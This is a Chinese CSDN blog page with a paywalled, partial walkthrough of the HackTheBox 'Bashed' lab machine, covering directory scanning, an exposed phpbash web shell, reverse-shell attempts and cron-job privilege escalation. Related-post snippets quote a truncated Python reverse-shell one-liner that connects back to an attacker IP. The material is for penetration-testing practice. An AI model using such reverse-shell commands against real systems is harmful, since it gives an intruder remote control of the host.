HackTheBox-Bashed渗透测试

最新推荐文章于 2023-02-06 15:31:24 发布
最新推荐文章于 2023-02-06 15:31:24 发布
阅读量349 收藏
点赞数
分类专栏: 靶机测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43111940/article/details/115679461
版权
本文记录了一次渗透测试的过程,首先通过端口扫描发现80端口开放,接着在靶机的/dev/目录下找到PHP shell文件。通过执行命令确认系统为Linux,并尝试使用反弹shell,但未成功。随后在靶机的tmp目录下利用msfvenom生成并下载PHP木马,最终通过GitHub上的php-reverse-shell脚本获取shell。进一步操作中,发现可以无密码以scriptmanager用户执行命令,枚举进程后找到了一个计划任务,利用此任务进行提权,成功拿到root权限。
摘要由CSDN通过智能技术生成

端口信息,只开了80端口
在这里插入图片描述
目录扫描

gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar'

在这里插入图片描述
/dev/目录下有php的shell文件

在这里插入图片描述
通过执行命令可以判断是Linux系统,因为对命令的大小写敏感

在这里插入图片描述
既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到shell
尝试在靶机上下载一句话木马,尝试也失败了,在当前目录下不可写,切换到tmp目录下下载

最低0.47元/天 解锁文章
fHack1r
关注
专栏目录
hackthebox-bashed (考点:phpbash,linux修改脚本)
冬萍子癸水
04-11 642
nmap 就一个80. 打开看看都很直白提示了是phpbash 拿dirbuster扫一扫 看到phpbash,点进去。进入网页版bash 把这个shell弹到我本机来 命令有很多,但我试了几个没反应 最后这个OK python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);...
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1349
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
【Hack The Box】linux练习-- Bashed(未完)
人间体佐菲的博客
11-08 450
【Hack The Box】linux练习-- Bashed
Hack the box靶机 bashed
菜浪马废的博客
05-07 392
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
Bashed -- hack the box
neal1991的专栏
04-04 536
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
HTB-hackthebox-Bashed
yutianovo的博客
03-01 540
靶机描述 清单 信息搜集 nmap dirsearch 未受到保护的危险php文件 提权 sudo -l 定时脚本 信息搜集 靶机IP 端口扫描 nmap 10.10.10.68 Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http 80 页面内容如下 介绍了 phpbash https://github.com/Arrexel/phpbash 功能是在 Web 页面里可以像交互式shell 一样进行
hack the box靶场练习之bashed
qq_44767905的博客
02-06 315
hack the box靶场练习之bashed
murmurhash.c:MurmurHash3通用hash bashed查找函数实现
06-20
MurmurHash3通用hash bashed查找函数实现 关于 是一种非加密哈希函数,适用于一般的基于哈希的查找。 此实现实现了 MurmurHash 的第 3 版。 安装 : $ clib install jwerle/murmurhash.c 来源: $ git clone git@...
靶场提权小全
m0_57221101的博客
02-08 3899
说是linux提权但在整理的时候不自主的把windows的内容也写了进去,结果变成了大杂烩,也不知道是好还是不好你 https://github.com/sagishahar/lpeworkshop Windows提权: ​FuzzySecurity | Windows Privilege Escalation Fundamentals ​https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalatio..
HackTheBox::Bashed
aya3t的博客
10-11 469
HackTheBox::Bashed
No.122-HackTheBox-Linux-Bashed-Walkthrough渗透学习
qq_34801745的博客
06-04 375
** HackTheBox-Linux-Ariekei-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/118 靶机难度:初级(4.5/10) 靶机发布日期:2017年12月20日 靶机描述: Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to th
HackTheBox-poison渗透测试
weixin_43111940的博客
04-23 277
端口信息 sudo nmap -sC -sV -A -p 22,80 10.10.10.84 访问80端口,显然是一个文件包含,故意输入一个不存在的文件名,爆出当前路径,不管有用没用,这是基操,在src里也是一个敏感信息泄露的低危 找到了pwdbackup.txt,密码是加密的 /etc/passwd 检查apache的访问日志,搜apache access logs freebsd就行 https://blog.codeasite.com/how-do-i-find-apache-http-
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Oopsie
Start C的博客
05-18 628
每当执行包含身份验证机制的 Web 评估时,始终建议检查 cookie、会话并尝试弄清楚访问控制的真正工作原理。 在许多情况下,远程代码执行攻击和系统立足点本身可能无法实现,而是在链接不同类型的漏洞和漏洞之后实现。 在此框中,我们将了解信息泄露和访问控制损坏类型的漏洞,即使它们看起来不是很重要,也会在攻击系统时产生很大的影响,因此即使是很小的漏洞也很重要。 先扫描一下:namp -sV -sC 10.129.133.42 开放了3个TCP端口,22 ssh,80 http,还有一个10626。 既然有8.
Haystack - hack the box
neal1991的专栏
11-30 608
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
道路识别
neal1991的专栏
04-11 7233
我们老板希望我能在道路识别这个方面做一些东西,这方面的东西一直在看,但是一直都是模模糊糊,我希望自己能够用一个合适的方式总结一下道路识别的问题。道路识别问题其实也正正恰好是识别问题中的一个方面,所以道路识别问题的关键也是在于如何选取一个特征来进行识别。道路识别问题可以使用不同的方法来解决,我打算从下面这些方面来阐述一下我自己对道路识别的一个理解: 我们要解决什么情况下的道路问题 其实我觉得这点挺重
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1517
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
入坑 Hack The Box
热门推荐
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Alibaba-Dragonwell-Standard-21.0.4.0.4.7-aarch64-linux.tar
11-11
基于OpenJDK开发的开源JDK,支持国内环境加密 解决maven下载不了,提示加解密失败的问题 Alibaba_Dragonwell_Standard_21.0.4.0.4.7_aarch64_linux.tar
【Unity游戏框架】Prodigy Game Framework快速搭建游戏原型
最新发布
11-11
文件名:Prodigy Game Framework_22.6.2 (20 Jun 2022).unitypackage Prodigy Game Framework 是一个强大的 Unity 游戏框架插件,专门为需要快速搭建游戏原型的开发者设计,适用于多种类型的游戏项目。它不仅包含大量核心系统,还提供了一些通用的游戏功能模块,帮助开发者加快游戏开发进度,同时保持代码和架构的灵活性。以下是 Prodigy Game Framework 的主要特点和功能: 1. 模块化游戏框架 Prodigy Game Framework 提供了模块化的游戏架构,允许开发者根据需求添加或移除不同功能模块。每个模块都是独立的,便于管理和扩展。 框架经过精心设计,以适应各种类型的游戏项目,从单人冒险到多人联网游戏都能轻松实现。 2. 场景管理 插件带有场景管理工具,可以轻松管理场景加载、卸载以及跨场景的数据传递,保证游戏的流畅切换。 支持场景内存优化、异步加载和场景过渡效果,有助于在不同平台上实现最佳性能。 3. 任务与成就系统 内置的任务系统可以让开发者为游戏添加多样化的任务,比如主线任务..
com.harmonyos4.exception.LoadBalancerFailureException.md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值